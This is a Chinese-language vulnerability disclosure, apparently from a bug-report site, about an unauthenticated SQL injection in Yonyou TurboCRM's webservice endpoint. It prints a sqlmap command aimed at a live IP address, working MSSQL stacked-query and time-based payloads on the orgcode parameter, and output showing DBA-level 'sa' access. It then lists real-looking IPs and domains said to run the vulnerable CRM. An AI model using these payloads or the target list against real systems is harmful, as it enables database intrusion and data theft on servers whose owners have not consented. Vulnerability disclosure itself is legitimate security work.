用友CRM注入漏洞(无需登录通杀所有版本)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友CRM注入漏洞,无需登录,通杀所有版本 ### 详细说明: 漏洞url: ``` http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1 ``` 使用sqlmap进行注入。 ``` sqlmap.py -u "http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1" --current-user --current-db --is-dba ``` ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: orgcode Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: class=WS_System&orgcode=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: class=WS_System&orgcode=1' WAITFOR DELAY '0:0:5'-- --- ``` ``` current user: 'sa' current database: 'turbocrm70' current user is DBA: True ``` 整理出了以下使用这套crm的网站,title:用友TurboCRM ``` 182.135.191.86 111.40.0.242:9091 222.171.32.36:9091 219.90.119.35:8081 180.168.98.94:8088 prm.yonyou.com www.kdlian.com:8001 prm.chanjet.com qinyuancrm.com kfdq369.gicp.net...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息